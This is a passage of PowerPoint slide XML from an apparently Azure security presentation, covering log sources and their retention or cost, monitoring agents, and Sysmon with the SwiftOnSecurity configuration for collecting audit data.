                      <a:endParaRPr lang="en-US" sz="140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cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Depending on Configuration</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1665983490"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437101">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure Application Insight</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Depending on Configuration</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1927718910"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437101">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>VM Event Logs</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OS</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Yes</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="3429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cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Size defined in Group Policy</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3065463595"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437101">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Custom Logs</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OS</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>N/A</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="3429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cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Application specific logs</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1168416217"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437101">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure Security Center</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (Cost per host/PaaS)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="3429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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Depending on Log Analytics</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2004020389"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="402439">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SaaS Usage</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>N/A</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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n-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Requires Cloud App Discovery</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="336481102"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="315238">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Custom Sources**</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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r>
                        <a:rPr lang="nb-NO" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>N/A</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="3429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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Depending on Configuration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="931089281"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23902359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15C4-871D-414A-A6E3-384D85BDF32F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485750" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Logging and Monitorering in Azure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14F76991-6E96-47A9-A5BD-B8E1B76DFEF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163974" y="1918399"/>
            <a:ext cx="7143482" cy="3234012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20FBE5F0-4E7E-466C-AEBD-FC9FC35C61AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596563" y="742340"/>
            <a:ext cx="3751771" cy="5487010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="625475" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1004888" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1065213" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="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rPr>
              <a:t>Microsoft Monitoring Agent (MMA) vs Log Analytics Agent (Legacy)</a:t>
            </a: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rPr>
              <a:t>MMA with Data Collection Rules</a:t>
            </a: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rPr>
              <a:t>Dependency Agent provides insight into processes and network connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="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None/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endPar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rPr>
              <a:t>Custom Log files in Preview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="0" lvl="1" indent="0"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None/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <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https://bit.ly/3vclP4d</a:t>
            </a:r>
            <a:endPar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endPar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rPr>
              <a:t>Sysmon with extra config to collect even more audit data </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0563C1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>SwiftOnSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0563C1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0563C1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>sysmon</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hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>-config</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41647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15C4-871D-414A-A6E3-384D85BDF32F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485750" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>How to see the full picture?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B32D8B-C9FF-4CD1-BE20-C143D2218E9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5621694" y="1367091"/>
            <a:ext cx="1000125" cy="923925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle: Rounded Corners 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57AD81E5-C07F-4887-B35A-9FF2FB3697A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465787" y="2757153"/>
            <a:ext cx="1856703" cy="940603"/>
          </a:xfrm>
